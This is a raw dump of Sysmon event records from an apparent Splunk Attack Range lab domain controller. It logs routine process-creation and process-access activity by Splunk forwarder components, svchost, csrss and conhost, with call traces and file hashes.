10341000x800000000000000014613Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:46:18.058{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-4B2A-6000-AC05-000000009A01}4468C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014612Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:46:18.058{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014611Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:46:18.058{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014610Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:46:18.058{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014609Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:46:18.058{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014608Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:46:18.058{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-4B2A-6000-AC05-000000009A01}4468C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000014607Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:46:18.058{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-4B2A-6000-AC05-000000009A01}4468C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000014606Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:46:18.059{08A6967A-4B2A-6000-AC05-000000009A01}4468C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000014631Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:46:19.823{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-4B2B-6000-AE05-000000009A01}5220C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014630Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:46:19.823{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014629Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:46:19.823{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014628Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:46:19.823{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014627Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:46:19.823{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014626Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:46:19.823{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-4B2B-6000-AE05-000000009A01}5220C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000014625Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:46:19.823{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-4B2B-6000-AE05-000000009A01}5220C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000014624Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:46:19.824{08A6967A-4B2B-6000-AE05-000000009A01}5220C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service